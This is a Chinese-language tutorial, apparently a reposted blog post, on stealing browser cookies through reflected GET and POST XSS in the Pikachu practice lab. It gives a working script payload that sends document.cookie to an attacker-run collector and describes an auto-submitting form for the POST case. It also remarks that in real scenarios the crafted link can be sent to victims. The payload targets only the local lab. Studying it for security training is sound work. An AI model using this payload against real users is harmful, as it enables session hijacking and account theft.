Web安全之利用XSS漏洞進行cookie獲取


攻擊者后台的搭建

首先我們搭建攻擊者后台用於接收我們獲取到的cookie信息,這里我們用的后台是是pikachu自帶的pkxss后台

打開pikachu網址找到管理工具點開xss后台

 

 

接着再點擊安裝初始化即

 

 

點擊進入首頁,輸入賬號密碼登入就完成了

 

 

 

get型xss:獲取cookie


攻擊流程圖:

 

 

 

 這里我的攻擊者服務器受害者服務器和漏洞服務器都為127.0.0.1:801

 

 

由於每個攻擊者端口不同,這里我們要修改pkxss后台文件中的xampp\htdocs\pkxss\xcookie下的cookie.php文件

將其中的ip地址修改為漏洞服務器地址

 

 

 接着再另一個頁面中打開pikachu登入到pkxss的后台

 

 

 

 接着開始get型xss的利用,打開pikachu的反射型xss(get)頁面,這里我們准備一個js的payload

<script>document.location='http://127.0.0.1:801/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

這段js代碼利用DOM里面的document.location的實例來做一個重定向,一旦用戶去訪問頁面這段js就會去訪問我們pkxss的后台,訪問時順便把cookie給帶過去

而且利用了DOM里面的document.cookie來獲取本地的cookie(ps:反射型xss(get)輸入框有字符數量限制,之前又說過如果解決)

然后將這段js代碼輸入提交即可

 

點提交之后頁面跳到了首頁,這時我們已經成功獲取到了用戶的cookie了

然后我們來到之前打開的pkxss頁面,點開cookie搜集刷新一下頁面

 

 

在實際場景當中我們可以把這段URL發送給用戶,一旦用戶在瀏覽器里面訪問了這個鏈接,用戶的cookie就會被發送到我們的后台

 

 

 post型xss:獲取cookie

其實和反射型的xss一樣的,只是提交post方式提交的,並不會在URL里面傳送參數 ,所以我們無法將我們的惡意代碼嵌到URL里面去發送給目標,我們可以在bp里抓包查看一下

 

 

 

攻擊原理流程圖

 

 

 首先我們點到反射型XSS(post)頁面登入一下

 

 

接着pkxss的文件\xampp\htdocs\pkxss\xcookie的post-html中的漏洞服務器器和攻擊者服務器修改成我們的自己的地址

 

這樣我們這個自動提交post表單的頁面就構造好了

只要我們讓用戶點這個這個我們構造好的會自動提交post請求的表單就可以獲取到用戶cookie

http://127.0.0.1:801/pikachu/pkxss/xcookie/post.html

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM